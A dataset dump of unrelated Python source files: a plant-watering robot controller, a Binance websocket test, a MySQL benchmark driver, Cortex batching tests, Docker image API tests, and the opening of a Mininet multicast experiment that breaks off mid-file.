source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
main.py
|
import client
import get_plant
import time
import RPi.GPIO as GPIO
import picamera
import math
import numpy as np
import argparse
import cv2
import json
import MPU9250
# GPIO setup
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.OUT)
GPIO.setup(25, GPIO.OUT)
servo=GPIO.PWM(17, 100)
# Connect to the server and take possession of the motors.
c = client.create_client("test")
c.conn()
import time
time.sleep(1)
c.send("take/9999999/motor1:1\n")
time.sleep(1)
c.send("take/9999999/odometry:1\n")
i = [0, 0, 0, 0]
last_time = time.time()
def update_pos():
"""Get odometry data and store the result in i.
"""
global i
while True:
msg = c.recv(10000)
try:
i = list(map(int, msg.rsplit(":", 1)[1].split(" ")))
except:
continue
time.sleep(0.25)
#set GPIO Pins
GPIO_TRIGGER = 23
GPIO_ECHO = 24
pos = [10, 10]
#set GPIO direction (IN / OUT)
GPIO.setup(GPIO_TRIGGER, GPIO.OUT)
GPIO.setup(GPIO_ECHO, GPIO.IN)
def distance():
# set Trigger to HIGH
GPIO.output(GPIO_TRIGGER, True)
# set Trigger after 0.01ms to LOW
time.sleep(0.00001)
GPIO.output(GPIO_TRIGGER, False)
StartTime = time.time()
StopTime = time.time()
# save StartTime
while GPIO.input(GPIO_ECHO) == 0:
StartTime = time.time()
# save time of arrival
while GPIO.input(GPIO_ECHO) == 1:
StopTime = time.time()
# time difference between start and arrival
TimeElapsed = StopTime - StartTime
# multiply with the sonic speed (34300 cm/s)
# and divide by 2, because there and back
distance = (TimeElapsed * 34300) / 2
return distance
import threading
a = threading.Thread(target=update_pos)
a.start()
def get_angle():
"""Get 400 readings from the MPU9250
"""
angles = []
xs = []
ys = []
data = mpu.readMagnet()
for i in range(400):
data = mpu.readMagnet()
while (data["x"] == 0 and data["y"] == 0):
time.sleep(0.01)
data = mpu.readMagnet()
data["x"] -= 39.66
data["x"] /= 24.47
data["y"] -= 2.8675
data["y"] /= 23.84
xs.append(data["x"])
ys.append(data["y"])
a = math.atan2(data["y"], data["x"])
angles.append(a)
time.sleep(0.015)
avg = sum(angles) / len(angles)
avg = math.atan2(sum(ys), sum(xs))
return avg
def get_pos(vals):
return (vals[1] + vals[2]) / 2, (vals[0] + vals[3]) / 2
def move(dist, to_left=1, to_right=1):
dist /= 0.90
vals = list(i)
left, right = get_pos(vals)
left_init = left
right_init = right
end_left = left + dist
end_right = right + dist
last_left, last_right = left, right
sl = 120
sr = 120
cu_l = 0
cu_r = 0
distance_obj_cm = 3000
while distance_obj_cm > 55 and (left < end_left or right < end_right):
# Stop if finished or an obstacle is nearby.
old_sl = sl
old_sr = sr
cur_left, cur_right = get_pos(i)
dl = cur_left - last_left
dr = cur_right - last_right
cu_l += dl
cu_r += dr
# Compute ratio used to choose the new speeds.
ratio = (cu_l + 0.1) / (cu_r + 0.1)
ratio2 = (cu_r + 0.1) / (cu_l + 0.1)
cur_ratio = (dl + 0.1) / (dr + 0.1)
cur_ratio2 = (dr + 0.1) / (dl + 0.1)
if cu_l < cu_r:
if sl < 125 or sr < 125:
sl *= ratio2
else:
sr /= ratio2
elif cu_l > cu_r:
if sr < 125 or sl < 125:
sr *= ratio
else:
sl /= ratio
if sl < 100:
sl = 100
if sr < 100:
sr = 100
if sl > 170:
sl = 170
if sr > 170:
sr = 170
# Send data to the arduino.
c.sendtoserial("motor1", int(sr) * to_left)
c.sendtoserial("motor2", int(sl) * to_right)
c.sendtoserial("motor3", int(sl) * to_right)
c.sendtoserial("motor4", int(sr) * to_left)
left, right = cur_left, cur_right
last_left, last_right = cur_left, cur_right
distance_obj_cm = distance()
print("DIST: ", distance_obj_cm)
time.sleep(0.25)
c.sendtoserial("motor1", "0")
c.sendtoserial("motor2", "0")
c.sendtoserial("motor3", "0")
c.sendtoserial("motor4", "0")
time.sleep(0.5)
if distance_obj_cm < 60:
return (1, left - left_init)
return (0, left - left_init)
def move_centimeter(cm):
"""Move n centimeters, recalibrating every meter.
"""
global init_angle, pos, tunny_right
unit_per_cm = 290 / 71 / 2 / 1.44
ret = []
while cm > 0.1:
cur = min(cm, 100)
cm -= cur
ret = move(unit_per_cm * cur)
if ret[0] == 1:
break
angle = get_angle()
old_angle = init_angle
init_angle = angle
turn(get_angle_diff(angle, old_angle)[1])
time.sleep(1)
if tunny_right == 1:
pos[1] += ret[1] / unit_per_cm
else:
pos[0] += ret[1] / unit_per_cm
if ret[0] == 1 and tunny_right:
found_obstacle(pos[0], pos[1] + 50)
else:
found_obstacle(pos[0] + 50, pos[1])
print(ret[1] / unit_per_cm)
def iset_servo_angle(angle_idx):
"""Set the servomotor angle to -90, -45, 0, 45 or 90 degrees.
"""
vals = [5, 9, 13, 17, 21]
servo.start(vals[angle_idx])
time.sleep(1.5)
servo.start(0)
mpu=MPU9250.MPU9250()
def get_angle_diff(angle1, angle2):
"""Return the angle, between 0 and 2*pi, between angle1 and angle2.
"""
diff = angle2 - angle1
while diff < -3.1415:
diff += 3.1415*2
while diff > 3.1415:
diff -= 3.1415*2
return abs(diff), diff
def turn(rad, first=True):
"""Turn until reaching rad angles difference from the current direction.
"""
global init_angle
target_angle = init_angle + rad
while target_angle > 3.1415:
target_angle -= 3.1415 * 2
while target_angle < -3.1415:
target_angle += 3.1415 * 2
rad *= -1
left_val = -1 if rad > 0 else 1
right_val = -left_val
c.sendtoserial("motor1", str(160 * left_val))
c.sendtoserial("motor2", str(160 * right_val))
c.sendtoserial("motor3", str(160 * right_val))
c.sendtoserial("motor4", str(160 * left_val))
time.sleep(abs(rad) / 2 + 0.1)
c.sendtoserial("motor1", "0")
c.sendtoserial("motor2", "0")
c.sendtoserial("motor3", "0")
c.sendtoserial("motor4", "0")
time.sleep(0.2)
angle = get_angle()
diff, dir = get_angle_diff(angle, target_angle)
if diff > 0.05:
time.sleep(0.1)
init_angle = angle
turn(dir, False)
if first:
init_angle=target_angle
time.sleep(0.5)
def overwrite_mapinit(x, y):
map_data = []
f_size = 4.5
print("x: " + str(x))
print("y: " + str(y))
with open('fetch/map.capture_init', 'r+') as map_file:
f_size = float(map_file.readline())
print(str(f_size))
map_data = list(map_file.read().replace('\n', ''))
n = y * f_size * 900 + x * f_size
for j in range(0, 60):
for i in range(0, 60):
map_data[int(900 * j + i + n)] = 'P'
map_file.close()
with open('fetch/map.capture_init', 'w+') as f:
f.write(str(f_size) + "\n")
map_str = ''.join(map_data)
f.write(map_str)
f.close()
def process_image(image_path):
name = image_path
source_image = cv2.imread(name)
average_color_per_row = np.average(source_image, axis=0)
average_color = np.average(average_color_per_row, axis=0)
average_color = np.uint8(average_color)
print(average_color)
average_color_img = np.array([[average_color]*100]*100, np.uint8)
return average_color
nb_photo = 0
camera = picamera.PiCamera()
camera.rotation = 90
camera.contrast = 60
def found_obstacle(x, y):
global nb_photo
camera.capture("fetch/pics/photo_" + str(nb_photo) + ".jpg");
is_plant = get_plant.get_plant("fetch/pics/photo_" + str(nb_photo) + ".jpg");
if is_plant:
# Water the plant
GPIO.output(25, True)
time.sleep(2)
GPIO.output(25, False)
print("True")
# Write data in data_json
try:
with open("fetch/data_json", "rt") as file:
data = json.load(file)
except IOError:
data = {}
if 'plants' not in data:
data['plants'] = []
str_pos = str(str(int(x)) + ',' + str(int(y)))
data['plants'].append({
'position' : str_pos,
'to_water' : '0',
'picture_path': "../fetch/pics/photo_" + str(nb_photo) + ".jpg"
})
with open("fetch/data_json", "wt") as outfile:
json.dump(data, outfile)
# Write data in map.capture_init
overwrite_mapinit(int(x), int(y))
else:
print("FALSE")
nb_photo += 1
init_angle = get_angle()
tunny_right = 0
move_centimeter(100)
time.sleep(2)
turn(-3.14/2)
tunny_right = 1
move_centimeter(100)
|
dev_test_dex_subscribe.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_test_dex_subscribe.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://lucit-systems-and-development.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
#pass
print(oldest_stream_data_from_stream_buffer)
# create instance of BinanceWebSocketApiManager for Binance Chain DEX
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.org")
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
markets = ['RAVEN-F66_BNB', 'ANKR-E97_BNB', 'AWC-986_BNB', 'COVA-218_BNB', 'BCPT-95A_BNB', 'WISH-2D5_BNB',
'MITH-C76_BNB', 'BNB_BTCB-1DE', 'BNB_USDSB-1AC', 'BTCB-1DE_USDSB-1AC', 'NEXO-A84_BNB']
stream_id = binance_websocket_api_manager.create_stream(["kline_1m"], markets)
markets = ['RAVEN-F66_BNB', 'ANKR-E97_BNB', 'AWC-986_BNB', 'COVA-218_BNB', 'BCPT-95A_BNB', 'WISH-2D5_BNB',
'MITH-C76_BNB', 'BNB_BTCB-1DE', 'BTCB-1DE_USDSB-1AC', 'NEXO-A84_BNB']
channels = ['kline_5m', 'kline_15m']
binance_websocket_api_manager.subscribe_to_stream(stream_id,
channels=['kline_1m', 'kline_5m', 'marketDepth',
'ticker', 'miniTicker', 'marketDiff'])
binance_websocket_api_manager.unsubscribe_from_stream(stream_id,
channels=['kline_1m', 'marketDepth',
'ticker', 'miniTicker', 'marketDiff'],
markets=markets)
binance_websocket_api_manager.get_stream_subscriptions(stream_id)
while True:
#binance_websocket_api_manager.print_summary()
binance_websocket_api_manager.print_stream_info(stream_id)
time.sleep(1)
|
mysql.py
|
import queue
import traceback
from threading import Thread
import pymysql
from common import util
class IDEBenchDriver:
def init(self, options, schema, driver_arg):
self.time_of_latest_request = 0
self.isRunning = False
self.requests = queue.LifoQueue()
# mysql properties
print("mysql initialization")
print("mysql db name: %s" % driver_arg['db'])
print("mysql table name: %s" % driver_arg['table'])
self.host = driver_arg['host']
self.port = driver_arg['port']
self.user = driver_arg['user']
self.password = driver_arg['password']
self.db = driver_arg['db']
self.table = driver_arg['table']
self.table_to_replace = driver_arg['table-to-replace']
def execute_vizrequest(self, viz_request, options, schema, result_queue):
print("processsing...")
viz = viz_request.viz
sql_statement = viz.get_computed_filter_as_sql(schema)
# make table name the same as mysql table
sql_statement = sql_statement.replace(self.table_to_replace, self.table)
print(sql_statement)
cursor = self.conn.cursor()
viz_request.start_time = util.get_current_ms_time()
cursor.execute(sql_statement)
# data = cursor.fetchall()
viz_request.end_time = util.get_current_ms_time()
print('query time: '+str(viz_request.end_time-viz_request.start_time))
cursor.close()
# results = {}
# for row in data:
# keys = []
# for i, bin_desc in enumerate(viz.binning):
#
# if "width" in bin_desc:
# bin_width = bin_desc["width"]
# keys.append(str(int(row[i])))
# else:
# keys.append(str(row[i]))
#
# key = ",".join(keys)
# results[key] = row[len(viz.binning):]
#
# viz_request.result = results
# write an empty result to the viz_request
viz_request.result = {}
# notify IDEBench that processing is done by writing it to the result buffer
result_queue.put(viz_request)
def process_request(self, viz_request, options, schema, result_queue):
self.requests.put((viz_request, options, schema, result_queue))
def process(self):
while self.isRunning:
try:
request = self.requests.get(timeout=1)
viz_request = request[0]
options = request[1]
schema = request[2]
result_queue = request[3]
# only execute requests that are newer than the last one we processed (drops old/no longer needed queries)
if viz_request.expected_start_time < self.time_of_latest_request:
viz_request.dropped = True
result_queue.put(viz_request)
continue
self.time_of_latest_request = viz_request.expected_start_time
self.execute_vizrequest(viz_request, options, schema, result_queue)
except queue.Empty as e:
# ignore queue-empty exceptions
print('requests queue empty.')
except Exception as e:
traceback.print_exc()
# pymysql 出现错误, 重获连接
self.conn.close()
self.conn = pymysql.connect(host=self.host, port=int(self.port), user=self.user, password=self.password, database=self.db)
pass
def workflow_start(self):
self.isRunning = True
self.time_of_latest_request = 0
# connection
self.conn = pymysql.connect(host=self.host, port=int(self.port), user=self.user, password=self.password, database=self.db)
thread = Thread(target=self.process)
thread.start()
def workflow_end(self):
self.isRunning = False
# close connection when done
# self.conn.close()
|
dynamic_batching_test.py
|
# Copyright 2021 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import threading as td
import time
from cortex_internal.lib.api.utils import DynamicBatcher
class Handler:
def handle_post(self, payload):
time.sleep(0.2)
return payload
def test_dynamic_batching_while_hitting_max_batch_size():
max_batch_size = 32
dynamic_batcher = DynamicBatcher(
Handler(),
method_name="handle_post",
max_batch_size=max_batch_size,
batch_interval=0.1,
test_mode=True,
)
counter = itertools.count(1)
event = td.Event()
global_list = []
def submitter():
while not event.is_set():
global_list.append(dynamic_batcher.process(payload=next(counter)))
time.sleep(0.1)
running_threads = []
for _ in range(128):
thread = td.Thread(target=submitter, daemon=True)
thread.start()
running_threads.append(thread)
time.sleep(60)
event.set()
# if this fails, then the submitter threads are getting stuck
for thread in running_threads:
thread.join(3.0)
if thread.is_alive():
raise TimeoutError("thread", thread.getName(), "got stuck")
sum1 = int(len(global_list) * (len(global_list) + 1) / 2)
sum2 = sum(global_list)
assert sum1 == sum2
# get the last 80% of batch lengths
# we ignore the first 20% because it may take some time for all threads to start making requests
batch_lengths = dynamic_batcher._test_batch_lengths
batch_lengths = batch_lengths[int(len(batch_lengths) * 0.2) :]
# verify that the batch size is always equal to the max batch size
assert len(set(batch_lengths)) == 1
assert max_batch_size in batch_lengths
def test_dynamic_batching_while_hitting_max_interval():
max_batch_size = 32
dynamic_batcher = DynamicBatcher(
Handler(),
method_name="handle_post",
max_batch_size=max_batch_size,
batch_interval=1.0,
test_mode=True,
)
counter = itertools.count(1)
event = td.Event()
global_list = []
def submitter():
while not event.is_set():
global_list.append(dynamic_batcher.process(payload=next(counter)))
time.sleep(0.1)
running_threads = []
for _ in range(2):
thread = td.Thread(target=submitter, daemon=True)
thread.start()
running_threads.append(thread)
time.sleep(30)
event.set()
# if this fails, then the submitter threads are getting stuck
for thread in running_threads:
thread.join(3.0)
if thread.is_alive():
raise TimeoutError("thread", thread.getName(), "got stuck")
sum1 = int(len(global_list) * (len(global_list) + 1) / 2)
sum2 = sum(global_list)
assert sum1 == sum2
# get the last 80% of batch lengths
# we ignore the first 20% because it may take some time for all threads to start making requests
batch_lengths = dynamic_batcher._test_batch_lengths
batch_lengths = batch_lengths[int(len(batch_lengths) * 0.2) :]
# verify that the batch size is always equal to the number of running threads
assert len(set(batch_lengths)) == 1
assert len(running_threads) in batch_lengths
|
api_image_test.py
|
import contextlib
import json
import shutil
import socket
import tarfile
import tempfile
import threading
import pytest
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
import docker
from ..helpers import requires_api_version, requires_experimental
from .base import BaseAPIIntegrationTest, BUSYBOX
class ListImagesTest(BaseAPIIntegrationTest):
def test_images(self):
res1 = self.client.images(all=True)
assert 'Id' in res1[0]
res10 = res1[0]
assert 'Created' in res10
assert 'RepoTags' in res10
distinct = []
for img in res1:
if img['Id'] not in distinct:
distinct.append(img['Id'])
assert len(distinct) == self.client.info()['Images']
def test_images_quiet(self):
res1 = self.client.images(quiet=True)
assert type(res1[0]) == six.text_type
class PullImageTest(BaseAPIIntegrationTest):
def test_pull(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
res = self.client.pull('hello-world', tag='latest')
self.tmp_imgs.append('hello-world')
assert type(res) == six.text_type
assert len(self.client.images('hello-world')) >= 1
img_info = self.client.inspect_image('hello-world')
assert 'Id' in img_info
def test_pull_streaming(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
stream = self.client.pull(
'hello-world', tag='latest', stream=True, decode=True)
self.tmp_imgs.append('hello-world')
for chunk in stream:
assert isinstance(chunk, dict)
assert len(self.client.images('hello-world')) >= 1
img_info = self.client.inspect_image('hello-world')
assert 'Id' in img_info
@requires_api_version('1.32')
@requires_experimental(until=None)
def test_pull_invalid_platform(self):
with pytest.raises(docker.errors.APIError) as excinfo:
self.client.pull('hello-world', platform='foobar')
assert excinfo.value.status_code == 500
assert 'invalid platform' in excinfo.exconly()
class CommitTest(BaseAPIIntegrationTest):
def test_commit(self):
container = self.client.create_container(BUSYBOX, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
assert 'Id' in res
img_id = res['Id']
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
assert 'Container' in img
assert img['Container'].startswith(id)
assert 'ContainerConfig' in img
assert 'Image' in img['ContainerConfig']
assert BUSYBOX == img['ContainerConfig']['Image']
busybox_id = self.client.inspect_image(BUSYBOX)['Id']
assert 'Parent' in img
assert img['Parent'] == busybox_id
def test_commit_with_changes(self):
cid = self.client.create_container(BUSYBOX, ['touch', '/test'])
self.tmp_containers.append(cid)
self.client.start(cid)
img_id = self.client.commit(
cid, changes=['EXPOSE 8000', 'CMD ["bash"]']
)
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
assert 'Container' in img
assert img['Container'].startswith(cid['Id'])
assert '8000/tcp' in img['Config']['ExposedPorts']
assert img['Config']['Cmd'] == ['bash']
class RemoveImageTest(BaseAPIIntegrationTest):
def test_remove(self):
container = self.client.create_container(BUSYBOX, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
assert 'Id' in res
img_id = res['Id']
self.tmp_imgs.append(img_id)
logs = self.client.remove_image(img_id, force=True)
assert {"Deleted": img_id} in logs
images = self.client.images(all=True)
res = [x for x in images if x['Id'].startswith(img_id)]
assert len(res) == 0
class ImportImageTest(BaseAPIIntegrationTest):
'''Base class for `docker import` test cases.'''
TAR_SIZE = 512 * 1024
def write_dummy_tar_content(self, n_bytes, tar_fd):
def extend_file(f, n_bytes):
f.seek(n_bytes - 1)
f.write(bytearray([65]))
f.seek(0)
tar = tarfile.TarFile(fileobj=tar_fd, mode='w')
with tempfile.NamedTemporaryFile() as f:
extend_file(f, n_bytes)
tarinfo = tar.gettarinfo(name=f.name, arcname='testdata')
tar.addfile(tarinfo, fileobj=f)
tar.close()
@contextlib.contextmanager
def dummy_tar_stream(self, n_bytes):
'''Yields a stream that is valid tar data of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file
@contextlib.contextmanager
def dummy_tar_file(self, n_bytes):
'''Yields the name of a valid tar file of size n_bytes.'''
with tempfile.NamedTemporaryFile(delete=False) as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file.name
def test_import_from_bytes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
# The generic import_image() function cannot import in-memory bytes
# data that happens to be represented as a string type, because
# import_image() will try to use it as a filename and usually then
# trigger an exception. So we test the import_image_from_data()
# function instead.
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_file(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
# statuses = self.client.import_image(
# src=tar_filename, repository='test/import-from-file')
statuses = self.client.import_image_from_file(
tar_filename, repository='test/import-from-file')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_stream(self):
with self.dummy_tar_stream(n_bytes=self.TAR_SIZE) as tar_stream:
statuses = self.client.import_image(
src=tar_stream, repository='test/import-from-stream')
# statuses = self.client.import_image_from_stream(
# tar_stream, repository='test/import-from-stream')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_image_from_data_with_changes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes',
changes=['USER foobar', 'CMD ["echo"]']
)
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
img_data = self.client.inspect_image(img_id)
assert img_data is not None
assert img_data['Config']['Cmd'] == ['echo']
assert img_data['Config']['User'] == 'foobar'
def test_import_image_with_changes(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
statuses = self.client.import_image(
src=tar_filename, repository='test/import-from-file',
changes=['USER foobar', 'CMD ["echo"]']
)
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
img_id = result['status']
self.tmp_imgs.append(img_id)
img_data = self.client.inspect_image(img_id)
assert img_data is not None
assert img_data['Config']['Cmd'] == ['echo']
assert img_data['Config']['User'] == 'foobar'
# Docs say output is available in 1.23, but this test fails on 1.12.0
@requires_api_version('1.24')
def test_get_load_image(self):
test_img = 'hello-world:latest'
self.client.pull(test_img)
data = self.client.get_image(test_img)
assert data
output = self.client.load_image(data)
assert any([
line for line in output
if 'Loaded image: {}'.format(test_img) in line.get('stream', '')
])
@contextlib.contextmanager
def temporary_http_file_server(self, stream):
'''Serve data from an IO stream over HTTP.'''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/x-tar')
self.end_headers()
shutil.copyfileobj(stream, self.wfile)
server = socketserver.TCPServer(('', 0), Handler)
thread = threading.Thread(target=server.serve_forever)
thread.setDaemon(True)
thread.start()
yield 'http://%s:%s' % (socket.gethostname(), server.server_address[1])
server.shutdown()
@pytest.mark.skipif(True, reason="Doesn't work inside a container - FIXME")
def test_import_from_url(self):
# The crappy test HTTP server doesn't handle large files well, so use
# a small file.
tar_size = 10240
with self.dummy_tar_stream(n_bytes=tar_size) as tar_data:
with self.temporary_http_file_server(tar_data) as url:
statuses = self.client.import_image(
src=url, repository='test/import-from-url')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
assert 'error' not in result
assert 'status' in result
img_id = result['status']
self.tmp_imgs.append(img_id)
@requires_api_version('1.25')
class PruneImagesTest(BaseAPIIntegrationTest):
def test_prune_images(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
# Ensure busybox does not get pruned
ctnr = self.client.create_container(BUSYBOX, ['sleep', '9999'])
self.tmp_containers.append(ctnr)
self.client.pull('hello-world', tag='latest')
self.tmp_imgs.append('hello-world')
img_id = self.client.inspect_image('hello-world')['Id']
result = self.client.prune_images()
assert img_id not in [
img.get('Deleted') for img in result.get('ImagesDeleted') or []
]
result = self.client.prune_images({'dangling': False})
assert result['SpaceReclaimed'] > 0
assert 'hello-world:latest' in [
img.get('Untagged') for img in result['ImagesDeleted']
]
assert img_id in [
img.get('Deleted') for img in result['ImagesDeleted']
]
class SaveLoadImagesTest(BaseAPIIntegrationTest):
@requires_api_version('1.23')
def test_get_image_load_image(self):
with tempfile.TemporaryFile() as f:
stream = self.client.get_image(BUSYBOX)
for chunk in stream:
f.write(chunk)
f.seek(0)
result = self.client.load_image(f.read())
success = False
result_line = 'Loaded image: {}\n'.format(BUSYBOX)
for data in result:
print(data)
if 'stream' in data:
if data['stream'] == result_line:
success = True
break
assert success is True
@requires_api_version('1.30')
class InspectDistributionTest(BaseAPIIntegrationTest):
def test_inspect_distribution(self):
data = self.client.inspect_distribution('busybox:latest')
assert data is not None
assert 'Platforms' in data
assert {'os': 'linux', 'architecture': 'amd64'} in data['Platforms']
|
mininet_multicast_dynamic.py
|
#!/usr/bin/env python
from groupflow_shared import *
from mininet.net import *
from mininet.node import OVSSwitch, UserSwitch
from mininet.link import TCLink
from mininet.log import setLogLevel
from mininet.cli import CLI
from mininet.node import Node, RemoteController
from scipy.stats import truncnorm
from numpy.random import randint, uniform
from subprocess import *
import sys
import signal
from time import sleep, time
from datetime import datetime
from multiprocessing import Process, Pipe
import numpy as np
import traceback
import os.path
# Hardcoded purely for testing / debug, these will be moved once functionality is stable
ARRIVAL_RATE = 5 * (1.0 / 60)
SERVICE_RATE = 1.0 / 60
TRIAL_DURATION_SECONDS = 60.0 * 3
RECEIVERS_AT_TRIAL_START = 5
STATS_RECORDING_INTERVAL = 5
MEDIA_DURATION_SECONDS = 72
def mcastTestDynamic(topo, hosts = [], log_file_name = 'test_log.log', replacement_mode='none', link_weight_type = 'linear', number_of_groups = 30, pipe = None):
test_groups = []
test_success = True
# First, check if the log file already exists, and stop the test if it does
# (This is primarily in place to allow continuing an interrupted trial set by running the same console command)
if os.path.isfile(log_file_name):
print 'Skipping trial, log file already exists: ' + str(log_file_name)
if pipe is not None:
pipe.send(test_success)
pipe.close()
return
# Launch the external controller
pox_link_weight_type = link_weight_type
static_link_weight = 0
util_link_weight = 1
if link_weight_type == 'linear': # Linear link weights
pox_link_weight_type = 'linear'
static_link_weight = 0
util_link_weight = 1
elif link_weight_type == 'sh': # Shortest-hop routing
pox_link_weight_type = 'linear'
static_link_weight = 1
util_link_weight = 0
elif link_weight_type == 'exponential': # Exponential link weights
pox_link_weight_type = 'exponential'
static_link_weight = 0
util_link_weight = 1
pox_arguments = []
static_link_weight = 0
if util_link_weight == 0:
static_link_weight = 1
if 'periodic' in replacement_mode:
pox_arguments = ['pox.py', 'log', '--file=pox.log,w', 'openflow.discovery', '--link_timeout=30', 'openflow.keepalive',
'openflow.flow_tracker', '--query_interval=1', '--link_max_bw=19', '--link_cong_threshold=13', '--avg_smooth_factor=0.5', '--log_peak_usage=True',
'misc.benchmark_terminator', 'openflow.igmp_manager', 'misc.groupflow_event_tracer',
'openflow.groupflow', '--static_link_weight=' + str(static_link_weight), '--util_link_weight=' + str(util_link_weight), '--link_weight_type=' + link_weight_type, '--flow_replacement_mode=' + replacement_mode,
'--flow_replacement_interval=10',
'log.level', '--WARNING', '--openflow.flow_tracker=INFO']
else:
pox_arguments = ['pox.py', 'log', '--file=pox.log,w', 'openflow.discovery', '--link_timeout=30', 'openflow.keepalive',
'openflow.flow_tracker', '--query_interval=1', '--link_max_bw=19', '--link_cong_threshold=13', '--avg_smooth_factor=0.5', '--log_peak_usage=True',
'misc.benchmark_terminator', 'openflow.igmp_manager', 'misc.groupflow_event_tracer',
'openflow.groupflow', '--static_link_weight=' + str(static_link_weight), '--util_link_weight=' + str(util_link_weight), '--link_weight_type=' + link_weight_type, '--flow_replacement_mode=' + replacement_mode,
'--flow_replacement_interval=10',
'log.level', '--WARNING', '--openflow.flow_tracker=INFO']
print 'Launching external controller: ' + str(pox_arguments[0])
print 'Launch arguments:'
print ' '.join(pox_arguments)
with open(os.devnull, "w") as fnull:
pox_process = Popen(pox_arguments, stdout=fnull, stderr=fnull, shell=False, close_fds=True)
# Allow time for the log file to be generated
sleep(1)
# Determine the flow tracker log file
pox_log_file = open('./pox.log', 'r')
flow_log_path = None
event_log_path = None
got_flow_log_path = False
got_event_log_path = False
while (not got_flow_log_path) or (not got_event_log_path):
pox_log = pox_log_file.readline()
if 'Writing flow tracker info to file:' in pox_log:
pox_log_split = pox_log.split()
flow_log_path = pox_log_split[-1]
got_flow_log_path = True
if 'Writing event trace info to file:' in pox_log:
pox_log_split = pox_log.split()
event_log_path = pox_log_split[-1]
got_event_log_path = True
print 'Got flow tracker log file: ' + str(flow_log_path)
print 'Got event trace log file: ' + str(event_log_path)
print 'Controller initialized'
pox_log_offset = pox_log_file.tell()
pox_log_file.close()
# External controller launched
# Launch Mininet
net = Mininet(topo, controller=RemoteController, switch=OVSSwitch, link=TCLink, build=False, autoSetMacs=True)
# pox = RemoteController('pox', '127.0.0.1', 6633)
